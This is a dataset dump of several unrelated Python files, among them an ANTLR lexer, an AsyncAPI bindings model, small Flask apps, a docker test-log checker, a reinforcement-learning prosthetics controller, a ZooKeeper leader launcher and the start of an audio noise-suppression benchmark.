buf.write("\16)\u0119\13)\3*\3*\3*\3*\7*\u011f\n*\f*\16*\u0122\13")
buf.write("*\3*\3*\3*\3+\3+\3,\3,\3-\3-\3.\3.\3.\3/\3/\7/\u0132\n")
buf.write("/\f/\16/\u0135\13/\3\60\3\60\3\60\3\60\5\60\u013b\n\60")
buf.write("\3\61\5\61\u013e\n\61\3\62\3\62\3\62\7\62\u0143\n\62\f")
buf.write("\62\16\62\u0146\13\62\3\62\3\62\3\62\3\62\7\62\u014c\n")
buf.write("\62\f\62\16\62\u014f\13\62\3\62\5\62\u0152\n\62\3\63\3")
buf.write("\63\3\63\5\63\u0157\n\63\3\64\3\64\3\64\5\64\u015c\n\64")
buf.write("\3\65\3\65\3\65\3\65\3\65\3\65\3\66\3\66\3\67\3\67\38")
buf.write("\38\39\59\u016b\n9\39\39\39\69\u0170\n9\r9\169\u0171\5")
buf.write("9\u0174\n9\39\59\u0177\n9\3:\3:\3:\7:\u017c\n:\f:\16:")
buf.write("\u017f\13:\5:\u0181\n:\3;\3;\5;\u0185\n;\3;\3;\3<\6<\u018a")
buf.write("\n<\r<\16<\u018b\3<\3<\3\u0120\2=\3\3\5\4\7\5\t\6\13\7")
buf.write("\r\b\17\t\21\n\23\13\25\f\27\r\31\16\33\17\35\20\37\21")
buf.write("!\22#\23%\24\'\25)\26+\27-\30/\31\61\32\63\33\65\34\67")
buf.write("\359\36;\37= ?!A\"C#E$G%I&K\'M(O)Q*S+U,W-Y.[/]\60_\2a")
buf.write("\2c\61e\2g\2i\2k\2m\2o\2q\62s\2u\2w\63\3\2\22\3\2\f\f")
buf.write("\3\2\13\13\b\2\"\"/<>>@@C\\c|\4\2//aa\5\2\u00b9\u00b9")
buf.write("\u0302\u0371\u2041\u2042\t\2C\\c|\u2072\u2191\u2c02\u2ff1")
buf.write("\u3003\ud801\uf902\ufdd1\ufdf2\uffff\n\2$$\61\61^^ddh")
buf.write("hppttvv\n\2))\61\61^^ddhhppttvv\5\2\62;CHch\5\2\2!$$^")
buf.write("^\5\2\2!))^^\3\2\62;\3\2\63;\4\2GGgg\4\2--//\4\2\17\17")
buf.write("\"\"\2\u019a\2\3\3\2\2\2\2\5\3\2\2\2\2\7\3\2\2\2\2\t\3")
buf.write("\2\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21\3\2")
buf.write("\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3\2\2")
buf.write("\2\2\33\3\2\2\2\2\35\3\2\2\2\2\37\3\2\2\2\2!\3\2\2\2\2")
buf.write("#\3\2\2\2\2%\3\2\2\2\2\'\3\2\2\2\2)\3\2\2\2\2+\3\2\2\2")
buf.write("\2-\3\2\2\2\2/\3\2\2\2\2\61\3\2\2\2\2\63\3\2\2\2\2\65")
buf.write("\3\2\2\2\2\67\3\2\2\2\29\3\2\2\2\2;\3\2\2\2\2=\3\2\2\2")
buf.write("\2?\3\2\2\2\2A\3\2\2\2\2C\3\2\2\2\2E\3\2\2\2\2G\3\2\2")
buf.write("\2\2I\3\2\2\2\2K\3\2\2\2\2M\3\2\2\2\2O\3\2\2\2\2Q\3\2")
buf.write("\2\2\2S\3\2\2\2\2U\3\2\2\2\2W\3\2\2\2\2Y\3\2\2\2\2[\3")
buf.write("\2\2\2\2]\3\2\2\2\2c\3\2\2\2\2q\3\2\2\2\2w\3\2\2\2\3y")
buf.write("\3\2\2\2\5{\3\2\2\2\7}\3\2\2\2\t\177\3\2\2\2\13\u0081")
buf.write("\3\2\2\2\r\u0083\3\2\2\2\17\u0085\3\2\2\2\21\u0087\3\2")
buf.write("\2\2\23\u0089\3\2\2\2\25\u008b\3\2\2\2\27\u0090\3\2\2")
buf.write("\2\31\u0096\3\2\2\2\33\u009b\3\2\2\2\35\u009d\3\2\2\2")
buf.write("\37\u009f\3\2\2\2!\u00a1\3\2\2\2#\u00a4\3\2\2\2%\u00a6")
buf.write("\3\2\2\2\'\u00ac\3\2\2\2)\u00b3\3\2\2\2+\u00ba\3\2\2\2")
buf.write("-\u00bf\3\2\2\2/\u00c6\3\2\2\2\61\u00d2\3\2\2\2\63\u00d4")
buf.write("\3\2\2\2\65\u00d6\3\2\2\2\67\u00d8\3\2\2\29\u00da\3\2")
buf.write("\2\2;\u00e0\3\2\2\2=\u00e5\3\2\2\2?\u00eb\3\2\2\2A\u00f3")
buf.write("\3\2\2\2C\u00f9\3\2\2\2E\u00fe\3\2\2\2G\u0102\3\2\2\2")
buf.write("I\u0105\3\2\2\2K\u0108\3\2\2\2M\u010b\3\2\2\2O\u010f\3")
buf.write("\2\2\2Q\u0111\3\2\2\2S\u011a\3\2\2\2U\u0126\3\2\2\2W\u0128")
buf.write("\3\2\2\2Y\u012a\3\2\2\2[\u012c\3\2\2\2]\u012f\3\2\2\2")
buf.write("_\u013a\3\2\2\2a\u013d\3\2\2\2c\u0151\3\2\2\2e\u0153\3")
buf.write("\2\2\2g\u0158\3\2\2\2i\u015d\3\2\2\2k\u0163\3\2\2\2m\u0165")
buf.write("\3\2\2\2o\u0167\3\2\2\2q\u016a\3\2\2\2s\u0180\3\2\2\2")
buf.write("u\u0182\3\2\2\2w\u0189\3\2\2\2yz\7<\2\2z\4\3\2\2\2{|\7")
buf.write("*\2\2|\6\3\2\2\2}~\7+\2\2~\b\3\2\2\2\177\u0080\7\60\2")
buf.write("\2\u0080\n\3\2\2\2\u0081\u0082\7}\2\2\u0082\f\3\2\2\2")
buf.write("\u0083\u0084\7.\2\2\u0084\16\3\2\2\2\u0085\u0086\7\177")
buf.write("\2\2\u0086\20\3\2\2\2\u0087\u0088\7]\2\2\u0088\22\3\2")
buf.write("\2\2\u0089\u008a\7_\2\2\u008a\24\3\2\2\2\u008b\u008c\7")
buf.write("v\2\2\u008c\u008d\7t\2\2\u008d\u008e\7w\2\2\u008e\u008f")
buf.write("\7g\2\2\u008f\26\3\2\2\2\u0090\u0091\7h\2\2\u0091\u0092")
buf.write("\7c\2\2\u0092\u0093\7n\2\2\u0093\u0094\7u\2\2\u0094\u0095")
buf.write("\7g\2\2\u0095\30\3\2\2\2\u0096\u0097\7p\2\2\u0097\u0098")
buf.write("\7w\2\2\u0098\u0099\7n\2\2\u0099\u009a\7n\2\2\u009a\32")
buf.write("\3\2\2\2\u009b\u009c\7>\2\2\u009c\34\3\2\2\2\u009d\u009e")
buf.write("\7@\2\2\u009e\36\3\2\2\2\u009f\u00a0\7\61\2\2\u00a0 \3")
buf.write("\2\2\2\u00a1\u00a2\7\61\2\2\u00a2\u00a3\7@\2\2\u00a3\"")
buf.write("\3\2\2\2\u00a4\u00a5\7?\2\2\u00a5$\3\2\2\2\u00a6\u00a7")
buf.write("\7u\2\2\u00a7\u00a8\7v\2\2\u00a8\u00a9\7f\2\2\u00a9\u00aa")
buf.write("\7k\2\2\u00aa\u00ab\7p\2\2\u00ab&\3\2\2\2\u00ac\u00ad")
buf.write("\7u\2\2\u00ad\u00ae\7v\2\2\u00ae\u00af\7f\2\2\u00af\u00b0")
buf.write("\7q\2\2\u00b0\u00b1\7w\2\2\u00b1\u00b2\7v\2\2\u00b2(\3")
buf.write("\2\2\2\u00b3\u00b4\7u\2\2\u00b4\u00b5\7v\2\2\u00b5\u00b6")
buf.write("\7f\2\2\u00b6\u00b7\7g\2\2\u00b7\u00b8\7t\2\2\u00b8\u00b9")
buf.write("\7t\2\2\u00b9*\3\2\2\2\u00ba\u00bb\7x\2\2\u00bb\u00bc")
buf.write("\7q\2\2\u00bc\u00bd\7k\2\2\u00bd\u00be\7f\2\2\u00be,\3")
buf.write("\2\2\2\u00bf\u00c0\7k\2\2\u00c0\u00c1\7o\2\2\u00c1\u00c2")
buf.write("\7r\2\2\u00c2\u00c3\7q\2\2\u00c3\u00c4\7t\2\2\u00c4\u00c5")
buf.write("\7v\2\2\u00c5.\3\2\2\2\u00c6\u00c7\7g\2\2\u00c7\u00c8")
buf.write("\7p\2\2\u00c8\u00c9\7x\2\2\u00c9\u00ca\7k\2\2\u00ca\u00cb")
buf.write("\7t\2\2\u00cb\u00cc\7q\2\2\u00cc\u00cd\7p\2\2\u00cd\u00ce")
buf.write("\7o\2\2\u00ce\u00cf\7g\2\2\u00cf\u00d0\7p\2\2\u00d0\u00d1")
buf.write("\7v\2\2\u00d1\60\3\2\2\2\u00d2\u00d3\7(\2\2\u00d3\62\3")
buf.write("\2\2\2\u00d4\u00d5\7#\2\2\u00d5\64\3\2\2\2\u00d6\u00d7")
buf.write("\7-\2\2\u00d7\66\3\2\2\2\u00d8\u00d9\7~\2\2\u00d98\3\2")
buf.write("\2\2\u00da\u00db\7u\2\2\u00db\u00dc\7v\2\2\u00dc\u00dd")
buf.write("\7c\2\2\u00dd\u00de\7t\2\2\u00de\u00df\7v\2\2\u00df:\3")
buf.write("\2\2\2\u00e0\u00e1\7u\2\2\u00e1\u00e2\7g\2\2\u00e2\u00e3")
buf.write("\7n\2\2\u00e3\u00e4\7h\2\2\u00e4<\3\2\2\2\u00e5\u00e6")
buf.write("\7c\2\2\u00e6\u00e7\7i\2\2\u00e7\u00e8\7g\2\2\u00e8\u00e9")
buf.write("\7p\2\2\u00e9\u00ea\7v\2\2\u00ea>\3\2\2\2\u00eb\u00ec")
buf.write("\7e\2\2\u00ec\u00ed\7j\2\2\u00ed\u00ee\7c\2\2\u00ee\u00ef")
buf.write("\7p\2\2\u00ef\u00f0\7p\2\2\u00f0\u00f1\7g\2\2\u00f1\u00f2")
buf.write("\7n\2\2\u00f2@\3\2\2\2\u00f3\u00f4\7t\2\2\u00f4\u00f5")
buf.write("\7g\2\2\u00f5\u00f6\7i\2\2\u00f6\u00f7\7g\2\2\u00f7\u00f8")
buf.write("\7z\2\2\u00f8B\3\2\2\2\u00f9\u00fa\7l\2\2\u00fa\u00fb")
buf.write("\7u\2\2\u00fb\u00fc\7q\2\2\u00fc\u00fd\7p\2\2\u00fdD\3")
buf.write("\2\2\2\u00fe\u00ff\7z\2\2\u00ff\u0100\7o\2\2\u0100\u0101")
buf.write("\7n\2\2\u0101F\3\2\2\2\u0102\u0103\7?\2\2\u0103\u0104")
buf.write("\7@\2\2\u0104H\3\2\2\2\u0105\u0106\7>\2\2\u0106\u0107")
buf.write("\7?\2\2\u0107J\3\2\2\2\u0108\u0109\7/\2\2\u0109\u010a")
buf.write("\7@\2\2\u010aL\3\2\2\2\u010b\u010c\7\62\2\2\u010cN\3\2")
buf.write("\2\2\u010d\u0110\5Q)\2\u010e\u0110\5S*\2\u010f\u010d\3")
buf.write("\2\2\2\u010f\u010e\3\2\2\2\u0110P\3\2\2\2\u0111\u0112")
buf.write("\7\61\2\2\u0112\u0113\7\61\2\2\u0113\u0117\3\2\2\2\u0114")
buf.write("\u0116\n\2\2\2\u0115\u0114\3\2\2\2\u0116\u0119\3\2\2\2")
buf.write("\u0117\u0115\3\2\2\2\u0117\u0118\3\2\2\2\u0118R\3\2\2")
buf.write("\2\u0119\u0117\3\2\2\2\u011a\u011b\7\61\2\2\u011b\u011c")
buf.write("\7,\2\2\u011c\u0120\3\2\2\2\u011d\u011f\13\2\2\2\u011e")
buf.write("\u011d\3\2\2\2\u011f\u0122\3\2\2\2\u0120\u0121\3\2\2\2")
buf.write("\u0120\u011e\3\2\2\2\u0121\u0123\3\2\2\2\u0122\u0120\3")
buf.write("\2\2\2\u0123\u0124\7,\2\2\u0124\u0125\7\61\2\2\u0125T")
buf.write("\3\2\2\2\u0126\u0127\t\2\2\2\u0127V\3\2\2\2\u0128\u0129")
buf.write("\t\3\2\2\u0129X\3\2\2\2\u012a\u012b\n\4\2\2\u012bZ\3\2")
buf.write("\2\2\u012c\u012d\7A\2\2\u012d\u012e\5]/\2\u012e\\\3\2")
buf.write("\2\2\u012f\u0133\5a\61\2\u0130\u0132\5_\60\2\u0131\u0130")
buf.write("\3\2\2\2\u0132\u0135\3\2\2\2\u0133\u0131\3\2\2\2\u0133")
buf.write("\u0134\3\2\2\2\u0134^\3\2\2\2\u0135\u0133\3\2\2\2\u0136")
buf.write("\u013b\5a\61\2\u0137\u013b\t\5\2\2\u0138\u013b\5s:\2\u0139")
buf.write("\u013b\t\6\2\2\u013a\u0136\3\2\2\2\u013a\u0137\3\2\2\2")
buf.write("\u013a\u0138\3\2\2\2\u013a\u0139\3\2\2\2\u013b`\3\2\2")
buf.write("\2\u013c\u013e\t\7\2\2\u013d\u013c\3\2\2\2\u013eb\3\2")
buf.write("\2\2\u013f\u0144\7$\2\2\u0140\u0143\5e\63\2\u0141\u0143")
buf.write("\5m\67\2\u0142\u0140\3\2\2\2\u0142\u0141\3\2\2\2\u0143")
buf.write("\u0146\3\2\2\2\u0144\u0142\3\2\2\2\u0144\u0145\3\2\2\2")
buf.write("\u0145\u0147\3\2\2\2\u0146\u0144\3\2\2\2\u0147\u0152\7")
buf.write("$\2\2\u0148\u014d\7)\2\2\u0149\u014c\5g\64\2\u014a\u014c")
buf.write("\5o8\2\u014b\u0149\3\2\2\2\u014b\u014a\3\2\2\2\u014c\u014f")
buf.write("\3\2\2\2\u014d\u014b\3\2\2\2\u014d\u014e\3\2\2\2\u014e")
buf.write("\u0150\3\2\2\2\u014f\u014d\3\2\2\2\u0150\u0152\7)\2\2")
buf.write("\u0151\u013f\3\2\2\2\u0151\u0148\3\2\2\2\u0152d\3\2\2")
buf.write("\2\u0153\u0156\7^\2\2\u0154\u0157\t\b\2\2\u0155\u0157")
buf.write("\5i\65\2\u0156\u0154\3\2\2\2\u0156\u0155\3\2\2\2\u0157")
buf.write("f\3\2\2\2\u0158\u015b\7^\2\2\u0159\u015c\t\t\2\2\u015a")
buf.write("\u015c\5i\65\2\u015b\u0159\3\2\2\2\u015b\u015a\3\2\2\2")
buf.write("\u015ch\3\2\2\2\u015d\u015e\7w\2\2\u015e\u015f\5k\66\2")
buf.write("\u015f\u0160\5k\66\2\u0160\u0161\5k\66\2\u0161\u0162\5")
buf.write("k\66\2\u0162j\3\2\2\2\u0163\u0164\t\n\2\2\u0164l\3\2\2")
buf.write("\2\u0165\u0166\n\13\2\2\u0166n\3\2\2\2\u0167\u0168\n\f")
buf.write("\2\2\u0168p\3\2\2\2\u0169\u016b\7/\2\2\u016a\u0169\3\2")
buf.write("\2\2\u016a\u016b\3\2\2\2\u016b\u016c\3\2\2\2\u016c\u0173")
buf.write("\5s:\2\u016d\u016f\7\60\2\2\u016e\u0170\t\r\2\2\u016f")
buf.write("\u016e\3\2\2\2\u0170\u0171\3\2\2\2\u0171\u016f\3\2\2\2")
buf.write("\u0171\u0172\3\2\2\2\u0172\u0174\3\2\2\2\u0173\u016d\3")
buf.write("\2\2\2\u0173\u0174\3\2\2\2\u0174\u0176\3\2\2\2\u0175\u0177")
buf.write("\5u;\2\u0176\u0175\3\2\2\2\u0176\u0177\3\2\2\2\u0177r")
buf.write("\3\2\2\2\u0178\u0181\7\62\2\2\u0179\u017d\t\16\2\2\u017a")
buf.write("\u017c\t\r\2\2\u017b\u017a\3\2\2\2\u017c\u017f\3\2\2\2")
buf.write("\u017d\u017b\3\2\2\2\u017d\u017e\3\2\2\2\u017e\u0181\3")
buf.write("\2\2\2\u017f\u017d\3\2\2\2\u0180\u0178\3\2\2\2\u0180\u0179")
buf.write("\3\2\2\2\u0181t\3\2\2\2\u0182\u0184\t\17\2\2\u0183\u0185")
buf.write("\t\20\2\2\u0184\u0183\3\2\2\2\u0184\u0185\3\2\2\2\u0185")
buf.write("\u0186\3\2\2\2\u0186\u0187\5s:\2\u0187v\3\2\2\2\u0188")
buf.write("\u018a\t\21\2\2\u0189\u0188\3\2\2\2\u018a\u018b\3\2\2")
buf.write("\2\u018b\u0189\3\2\2\2\u018b\u018c\3\2\2\2\u018c\u018d")
buf.write("\3\2\2\2\u018d\u018e\b<\2\2\u018ex\3\2\2\2\30\2\u010f")
buf.write("\u0117\u0120\u0133\u013a\u013d\u0142\u0144\u014b\u014d")
buf.write("\u0151\u0156\u015b\u016a\u0171\u0173\u0176\u017d\u0180")
buf.write("\u0184\u018b\3\b\2\2")
return buf.getvalue()
class APiLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
T__0 = 1
T__1 = 2
T__2 = 3
T__3 = 4
T__4 = 5
T__5 = 6
T__6 = 7
T__7 = 8
T__8 = 9
T__9 = 10
T__10 = 11
T__11 = 12
T__12 = 13
T__13 = 14
T__14 = 15
T__15 = 16
T__16 = 17
STDIN = 18
STDOUT = 19
STDERR = 20
VOID = 21
IMPORT = 22
ENVIRONMENT = 23
ONSUCCESS = 24
ONFAIL = 25
RESTART = 26
PARALLEL = 27
START = 28
SELF = 29
AGENT = 30
CHANNEL = 31
REGEX = 32
JSON = 33
XML = 34
INPUT_FORMAT = 35
OUTPUT_FORMAT = 36
SENDS = 37
NIL = 38
COMMENT = 39
COMMENT1 = 40
COMMENT2 = 41
NEWLINE = 42
TAB = 43
SPEC_CHAR = 44
VARIABLE = 45
IDENT = 46
STRING = 47
NUMBER = 48
SPACE = 49
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE" ]
literalNames = [ "<INVALID>",
"':'", "'('", "')'", "'.'", "'{'", "','", "'}'", "'['", "']'",
"'true'", "'false'", "'null'", "'<'", "'>'", "'/'", "'/>'",
"'='", "'stdin'", "'stdout'", "'stderr'", "'void'", "'import'",
"'environment'", "'&'", "'!'", "'+'", "'|'", "'start'", "'self'",
"'agent'", "'channel'", "'regex'", "'json'", "'xml'", "'=>'",
"'<='", "'->'", "'0'" ]
symbolicNames = [ "<INVALID>",
"STDIN", "STDOUT", "STDERR", "VOID", "IMPORT", "ENVIRONMENT",
"ONSUCCESS", "ONFAIL", "RESTART", "PARALLEL", "START", "SELF",
"AGENT", "CHANNEL", "REGEX", "JSON", "XML", "INPUT_FORMAT",
"OUTPUT_FORMAT", "SENDS", "NIL", "COMMENT", "COMMENT1", "COMMENT2",
"NEWLINE", "TAB", "SPEC_CHAR", "VARIABLE", "IDENT", "STRING",
"NUMBER", "SPACE" ]
ruleNames = [ "T__0", "T__1", "T__2", "T__3", "T__4", "T__5", "T__6",
"T__7", "T__8", "T__9", "T__10", "T__11", "T__12", "T__13",
"T__14", "T__15", "T__16", "STDIN", "STDOUT", "STDERR",
"VOID", "IMPORT", "ENVIRONMENT", "ONSUCCESS", "ONFAIL",
"RESTART", "PARALLEL", "START", "SELF", "AGENT", "CHANNEL",
"REGEX", "JSON", "XML", "INPUT_FORMAT", "OUTPUT_FORMAT",
"SENDS", "NIL", "COMMENT", "COMMENT1", "COMMENT2", "NEWLINE",
"TAB", "SPEC_CHAR", "VARIABLE", "IDENT", "NameChar1",
"NameStartChar1", "STRING", "ESC1", "ESC2", "UNICODE",
"HEX", "SAFECODEPOINT1", "SAFECODEPOINT2", "NUMBER", "INT",
"EXP", "SPACE" ]
grammarFileName = "APi.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.9")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
|
StarcoderdataPython
|
3271523
|
<gh_stars>0
from typing import Optional
from pydantic import BaseModel, Extra
from .http_bindings import HttpServerBinding
from .web_sockets_bindings import WebSocketsServerBinding
from .kafka_bindings import KafkaServerBinding
from .anypoint_mq_bindings import AnypointMqServerBinding
from .amqp_bindings import AmqpServerBinding
from .amqp1_bindings import Amqp1ServerBinding
from .mqtt_bindings import MqttServerBinding
from .mqtt5_bindings import Mqtt5ServerBinding
from .nats_bindings import NatsServerBinding
from .jms_bindings import JmsServerBinding
from .sns_bindings import SnsServerBinding
from .solace_bindings import SolaceServerBinding
from .sqs_bindings import SqsServerBinding
from .stomp_bindings import StompServerBinding
from .redis_bindings import RedisServerBinding
from .mercure_bindings import MercureServerBinding
from .ibm_mq_bindings import IbmMqServerBinding
class ServerBindings(BaseModel):
"""
Map describing protocol-specific definitions for a server.
"""
http: Optional[HttpServerBinding] = None
"""
Protocol-specific information for an HTTP server.
"""
ws: Optional[WebSocketsServerBinding] = None
"""
Protocol-specific information for a WebSockets server.
"""
kafka: Optional[KafkaServerBinding] = None
"""
Protocol-specific information for a Kafka server.
"""
anypointmq: Optional[AnypointMqServerBinding] = None
"""
Protocol-specific information for an Anypoint MQ server.
"""
amqp: Optional[AmqpServerBinding] = None
"""
Protocol-specific information for an AMQP 0-9-1 server.
"""
amqp1: Optional[Amqp1ServerBinding] = None
"""
Protocol-specific information for an AMQP 1.0 server.
"""
mqtt: Optional[MqttServerBinding] = None
"""
Protocol-specific information for an MQTT server.
"""
mqtt5: Optional[Mqtt5ServerBinding] = None
"""
Protocol-specific information for an MQTT 5 server.
"""
nats: Optional[NatsServerBinding] = None
"""
Protocol-specific information for a NATS server.
"""
jms: Optional[JmsServerBinding] = None
"""
Protocol-specific information for a JMS server.
"""
sns: Optional[SnsServerBinding] = None
"""
Protocol-specific information for an SNS server.
"""
solace: Optional[SolaceServerBinding] = None
"""
Protocol-specific information for a Solace server.
"""
sqs: Optional[SqsServerBinding] = None
"""
Protocol-specific information for an SQS server.
"""
stomp: Optional[StompServerBinding] = None
"""
Protocol-specific information for a STOMP server.
"""
redis: Optional[RedisServerBinding] = None
"""
Protocol-specific information for a Redis server.
"""
mercure: Optional[MercureServerBinding] = None
"""
Protocol-specific information for a Mercure server.
"""
ibmmq: Optional[IbmMqServerBinding] = None
"""
Protocol-specific information for an IBM MQ server.
"""
class Config:
extra = Extra.forbid
|
StarcoderdataPython
|
4802078
|
<gh_stars>1-10
import asyncio
import background
asyncio.run(background.connect())
|
StarcoderdataPython
|
90182
|
<reponame>bevrand/bevrand
import subprocess
import json
import time
import argparse
parser = argparse.ArgumentParser(description='Create a docker-compose file based on arguments given')
tests_action_arg = parser.add_argument('--tests', type=str, default='component_tests',
help='Test set to valdidate (default: %(default)s)')
args = parser.parse_args()
TESTS = args.tests
print(TESTS)
def wait_for_container_to_finish():
running = True
while running:
status = subprocess.check_output("docker inspect " + TESTS, shell=True)
status_json = json.loads(status)
state = status_json[0]['State']
running = state['Running']
time.sleep(2)
def check_logs_for_backend():
logs = subprocess.check_output("docker logs " + TESTS, shell=True)
logs = str(logs)
output = logs.replace("\\n", "\n")
print(output)
return logs
def validate_test_results():
wait_for_container_to_finish()
logs = str(check_logs_for_backend()).rstrip().replace(",", "")
words = logs.split()
terms = ['failed', 'FAILURES']
for term in terms:
if term in words:
exit(1)
else:
exit(0)
validate_test_results()
|
StarcoderdataPython
|
26523
|
<gh_stars>0
#!env/bin/python3
from app import app
app.run(debug=True, host="localhost", port=8202)
|
StarcoderdataPython
|
3278262
|
<filename>djaludir/core/tests/models/test_privacy.py
from django.conf import settings
from django.test import TestCase
from djaludir.core.models import Privacy
from djtools.utils.logging import seperator
class CorePrivacyTestCase(TestCase):
fixtures = ['user.json', 'privacy.json']
def setUp(self):
self.cid = settings.TEST_USER_COLLEGE_ID
def test_privacy(self):
print("\n")
print("test privacy ORM data model")
print(seperator())
privacies = Privacy.objects.filter(user__id=self.cid)
print("len = {}".format(len(privacies)))
for privacy in privacies:
print(privacy)
self.assertGreaterEqual(len(privacies), 1)
|
StarcoderdataPython
|
3399678
|
<gh_stars>1-10
import opensim as osim
from osim.http.client import Client
from osim.env import ProstheticsEnv
import os
import time
from collections import deque
import pickle
from baselines.ddpg.models import Actor, Critic
from baselines.ddpg.memory import Memory
from baselines.ddpg.ddpg import DDPG
import baselines.common.tf_util as U
from baselines import logger
import numpy as np
import tensorflow as tf
from mpi4py import MPI
from baselines.common.vec_env.subproc_vec_env import SubprocVecEnv
from osim.env import ProstheticsEnv
import sys
env = ProstheticsEnv(visualize=False)
env.change_model(model = '3D', difficulty = 2, prosthetic = True)
layer_norm=True
nb_actions=19
memory = Memory(limit=int(1.5e6), action_shape=env.action_space.shape, observation_shape=env.observation_space.shape)
critic = Critic(layer_norm=layer_norm)
actor = Actor(nb_actions, layer_norm=layer_norm)
agent = DDPG(actor, critic, memory, env.observation_space.shape, env.action_space.shape,
gamma=0.99)
saver=tf.train.Saver()
# IMPLEMENTATION OF YOUR CONTROLLER
# my_controller = ... (for example the one trained in keras_rl)
sess=tf.InteractiveSession()
agent.initialize(sess)
sess.graph.finalize()
agent.reset()
filename="/home/vaisakhs_shaj/Desktop/MODEL/tfSteps"+str(10000)+".model"
saver.restore(sess,filename)
observation=env.reset()
#print([n.name for n in tf.get_default_graph().as_graph_def().node])
def my_controller(obs):
action=agent.pi(obs, apply_noise=False, compute_Q=False)[0]
return action
tr=0
s=0
while True:
[observation, reward, done, info] = env.step(my_controller(observation))
print(reward,done)
s=s+1
tr=tr+reward
sys.stdout.flush()
if done:
observation = env.reset()
print(tr)
print(s)
break
#client.submit()
|
StarcoderdataPython
|
199475
|
from flask import Flask, request, redirect, render_template, session, flash
from mysqlconnection import MySQLConnector
import datetime
import re
app = Flask(__name__)
app.secret_key = "ThisIsSecret!"
mysql = MySQLConnector(app,'full_friends_db')
DATE_REGEX = re.compile(r'^(1[0-2]|0[1-9])/(3[01]|[12][0-9]|0[1-9])/[0-9]{4}$')
@app.route('/')
def index():
query = "SELECT * FROM friends"
friends = mysql.query_db(query)
return render_template('index.html', all_friends=friends)
@app.route('/add', methods=['POST'])
def create():
error = False
# DATE VALIDATION
if len(request.form['friend_since']) < 1:
print "No length"
flash("Date cannot be blank")
error = True
elif not DATE_REGEX.match(request.form['friend_since']):
print "No format"
flash("Invalid date, use mm/dd/yyyy format")
error = True
else:
current_time = datetime.datetime.now()
temp_time = datetime.datetime.strptime(request.form['friend_since'], "%m/%d/%Y")
if temp_time >= current_time:
print "No future"
flash("Invalid date, cannot be equal or in the future")
error = True
if(error == True):
return redirect('/')
else:
print "No error"
query = "INSERT INTO friends (name, age, friend_since, year) VALUES (:name, :age, DATE_FORMAT(STR_TO_DATE(:friend_since, '%m/%d/%Y'), '%M %e, %Y'), DATE_FORMAT(STR_TO_DATE(:friend_since, '%m/%d/%Y'), '%Y'))"
data = {
'name': request.form['name'],
'age': request.form['age'],
'friend_since': request.form['friend_since']
}
mysql.query_db(query, data)
return redirect('/')
app.run(debug=True)
|
StarcoderdataPython
|
1668069
|
<reponame>YahooArchive/ZooChiefs
#!/usr/bin/env python
# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import hashlib
import logging
import os
import sys
sys.path.insert(0, os.path.join(os.path.abspath(os.pardir)))
sys.path.insert(0, os.path.abspath(os.getcwd()))
from chief import leader
ZNODE_TPL = '/pc-%s'
def setup_logging(log_level, format='%(process)d %(levelname)s: @%(name)s : %(message)s'):
root_logger = logging.getLogger()
console_logger = logging.StreamHandler(sys.stdout)
console_logger.setFormatter(logging.Formatter(format))
root_logger.addHandler(console_logger)
root_logger.setLevel(log_level)
def _get_znode(bin):
m = hashlib.new('md5')
m.update(str(bin))
return ZNODE_TPL % (m.hexdigest())
def run_solo():
parser = argparse.ArgumentParser()
parser.add_argument('binary', metavar='binary', type=str, nargs=1,
help='main program')
parser.add_argument('args', metavar='arg', type=str, nargs='*',
help='program arguments')
parser.add_argument('--zk-server', '-z', action='append',
help='zookeeper server address',
default=['localhost:2181'])
parser.add_argument('--verbose', '-v', action='append_const', const=1,
help='increase verbosity')
args = parser.parse_args()
if not args.binary:
parser.error("No binary provided")
if len(args.verbose) >= 2:
setup_logging(logging.DEBUG)
elif len(args.verbose) == 1:
setup_logging(logging.INFO)
else:
setup_logging(logging.ERROR)
znode_name = _get_znode(args.binary[0])
c = leader.ZKProcessLeader(znode_name, args.zk_server)
(_out, _err, rc) = c.start(args.binary[0], *args.args)
return rc
if __name__ == '__main__':
sys.exit(run_solo())
|
StarcoderdataPython
|
1699361
|
<filename>ABC124/C.py
s = list(input())
o0, o1, e0, e1 = 0,0,0,0
for i in range(len(s)//2):
if s[i*2] == "0":
o0 += 1
elif s[i*2] == "1":
o1 += 1
if s[i*2+1] == "0":
e0 += 1
elif s[i*2+1] == "1":
e1 += 1
if len(s)%2 == 1:
if s[len(s)-1] == "0":
o0 += 1
else:
o1 += 1
print( min( o1+e0, e1+o0 ) )
|
StarcoderdataPython
|
91597
|
from .dosed1 import DOSED1
from .dosed2 import DOSED2
from .dosed3 import DOSED3
__all__ = [
"DOSED1",
"DOSED2",
"DOSED3",
]
|
StarcoderdataPython
|
1774989
|
import audio.audioHandler as audio
import numpy as np
import matplotlib.pyplot as plt
import csv
import time
from app.supression.spectralSubtraction import spectralSubtraction
from app.supression.fastLMS import fastLMS
from app.supression.plca import plcaWavelet
def runTests():
audioPrefix = 'audio_files/'
resultPrefix = 'results/'
# audioLengthMultipliers = [2, 4, 6]
audioLengthMultipliers = [2]
repetitions = 20
audioFile = 'die_hard'
noiseFiles = ['echoPlanar', 'diffusion', 'fastSpinEcho']
methods = ['spectralSubtraction', 'flms', 'plcaWavelet']
audioArray, sampleRate = audio.getData(audioPrefix + audioFile + '.wav')
audioArray = audioArray[:sampleRate * 30]
headers = ['']
content = []
testsAmount = repetitions * len(noiseFiles) * len(audioLengthMultipliers) * len(methods)
start = time.time()
current = 0
for multiplier in audioLengthMultipliers:
testAudio = np.tile(audioArray, multiplier)
